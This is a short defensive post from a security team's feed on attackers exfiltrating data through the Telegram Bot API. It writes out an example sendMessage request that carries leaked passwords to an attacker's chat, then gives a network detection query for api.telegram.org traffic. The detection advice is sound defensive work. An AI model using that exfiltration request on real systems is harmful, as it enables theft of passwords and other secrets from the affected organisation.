[ << ALL_FEED ]

A cart full of hackers

More in General

Hackers’ Telegram Cart

According to the latest trends (e.g., Lazy Koala), attackers are increasingly resorting to data exfiltration or C2 channels via the Telegram messenger.

It really is that simple: just send a web request like this to transfer sensitive information (e.g., passwords) from any computer on your infrastructure:


https://api.telegram.org/bot$BOT_TOKEN/sendMessage?text=LEAKED_PASSWORDS&chat_id=xxxx

Thus, attackers try to hide their network activity within streams of legitimate Telegram network sessions, which are now used almost everywhere.

Attackers overlooked just one thing: network traffic from the desktop or mobile Telegram app and a web request to the API are very different.

The Telegram API is also an automation and bot management tool. If your organization does use it, it is from specific hosts and in limited quantities.

🚩 The appearance of such requests from a user’s machine is a red flag for your security tools. And finding such network sessions is easy — with a single query to an NTA system:


tls.server_name == "api.telegram.org"

#detect #network #tip
@ptescalator

More from global_author

More from global_author

More in General